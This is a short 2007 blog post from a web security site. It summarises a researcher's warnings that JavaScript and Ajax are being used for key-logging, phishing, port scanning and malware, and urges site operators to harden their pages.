Site Sponsor:

mcafee_logo.gif
line

Now Available:

Featured Resource:

line

Realtime Communities

line

Newsletter

Email Address:


line

Monthly Archives

line

RSS

line

Ask the Expert

Have a question for our resident expert? Email your questions to Dan or post a comment to the blog.

« Identity Theft Legislation In The Works | Main | Policy Enforcement Tools »

Ajax Security Risks

Billy Hoffman of SPI Dynamics is speaking out about the risks of JavaScript and Ajax and was quoted in a recent InfoWorld article. One of the most telling quotes about the state of Web application security from Hoffman is:

"In the last two years, we've seen JavaScript go from stealing cookies to doing key-logging, screen-scraping and all sorts of phishing attacks," Hoffman said. "JavaScript used to be something that was more annoying than anything, but now it's being used in port scanning, to create self-propagating malware and to steal browser histories."

We've known JavaScript is vulnerable to attacks for a long time but new development techniques, like Ajax, and the development tools that support these techniques, are increasing the potential for introducing these vulnerabilities to your sites.

Hoffman goes on to say:

The only way to improve the situation is for site operators to undertake more comprehensive efforts to rid their pages of the problems, said Hoffman, and for them to slow down adoption of newer languages, such as AJAX, which appear to outstrip many Web developers' security skills.

For more on Ajax security, see Ajax Security Basics.

Tags:  
 Email This!  Digg it!  Sphere it!  Del.icio.us  Reddit!  Newsvine

Posted by Dan Sullivan on March 26, 2007 12:24 PM |

TrackBack

TrackBack URL for this entry:
http://www.realtime-websecurity.com/type/mt-tb.cgi/261

Post a comment

(All comments are approved by site leader before appearing here. Thanks for commenting!)

Search

line

Most Active Posts

line

Library Resources

line
line

Recent Posts

line

Categories

line

Latest White Papers

line

Blog Roll

line

Dan Sullivan's Bio:

Dan Sullivan is a systems architect with 20 years of IT experience that includes engagements in enterprise security, application design, and systems architecture. His experience includes a broad range of industries, including financial services, manufacturing, government, retail, gas and oil production, power generation, and education. Dan’s security-related project work has ranged from requirements analysis for enterprise information security to designing and implementing security for database applications and enterprise portals. Dan has written about information security and other enterprise information management topics for Business Security Advisor, DM Review, Intelligent Enterprise, and E-Business Advisor. You can contact Dan at: dan_sullivan@realtimepublishers.net